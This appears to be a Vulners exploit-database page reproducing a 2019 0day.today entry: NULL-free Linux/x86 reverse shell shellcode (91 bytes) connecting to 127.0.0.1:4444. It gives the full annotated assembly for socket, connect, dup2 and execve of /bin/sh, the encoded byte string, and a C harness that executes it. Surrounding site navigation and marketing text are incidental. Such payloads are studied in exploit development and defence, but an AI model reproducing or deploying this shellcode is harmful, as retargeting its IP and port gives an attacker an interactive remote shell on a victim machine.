Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)

🗓️ 16 Oct 2019 00:00:00Reported by bolonoboloType 
zdt
 zdt🔗 0day.today👁 65 Views

Linux/x86 Reverse Shellcode to 127.0.0.1:4444 (91 bytes)

Code
# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
# Author:  bolonobolo
# Tested on: Linux x86
# Software: N/A
# CVE: N/A

/*
global _start			

section .text
_start:


	;socket()
	xor ecx, ecx        ; xoring ECX
	xor ebx, ebx        ; xoring EBX
	mul ebx             ; xoring EAX and EDX
	inc cl              ; ECX should be 1
	inc bl
	inc bl              ; EBX should be 2
	mov ax, 0x167       ;
	int 0x80            ; call socket()

	;connect()          ; move the return value of socket
	xchg ebx, eax       ; from EAX to EBX ready for the next syscalls

	; push sockaddr structure in the stack
	dec cl
	push ecx                ; unused char (0)

	; move the lenght (16 bytes) of IP in EDX
	mov dl, 0x16

	; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes
	mov ecx, 0x04030382              ; mov ip in ecx
	sub ecx, 0x03030303              ; subtract 3.3.3.3 from ip
	push ecx                         ; load the real ip in the stack
	push word 0x5c11                 ; port 4444
	push word 0x02                   ; AF_INET family
	lea ecx, [esp]
	                                 ; EBX still contain the value of the
opened socket
	mov ax, 0x16a
	int 0x80

	; dup2()
	    xor ecx, ecx
	    mov cl, 0x3

	dup2:
	    xor eax, eax
	                                 ; EBX still contain the value of the
opened socket
	    mov al, 0x3f
	    dec cl
	    int 0x80
	    jnz dup2

	; execve() from the previous polymorphic analysis 25 bytes
	cdq                     ; xor edx
	mul edx                 ; xor eax
	lea ecx, [eax]          ; xor ecx
	mov esi, 0x68732f2f
	mov edi, 0x6e69622f
	push ecx                ; push NULL in stack
	push esi                ; push hs/ in stack
	push edi                ; push nib// in stack
	lea ebx, [esp]          ; load stack pointer to ebx
	mov al, 0xb             ; load execve in eax
	int 0x80
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc9\x31\xdb\xf7\xe3\xfe\xc1\xfe\xc3\xfe\xc3\x66\xb8\x67\x01\xcd\x80\x93\xfe\xc9\x51\xb2\x16\xb9\x82\x03\x03\x04\x81\xe9\x03\x03\x03\x03\x51\x66\x68\x11\x5c\x66\x6a\x02\x8d\x0c\x24\x66\xb8\x6a\x01\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Oct 2019 00:00Current
7.4High risk
Vulners AI Score7.4
reverse shellcodelinux x86null free127.0.0.14444shellcodeexploitbolonobolosocketconnectdup2execve
65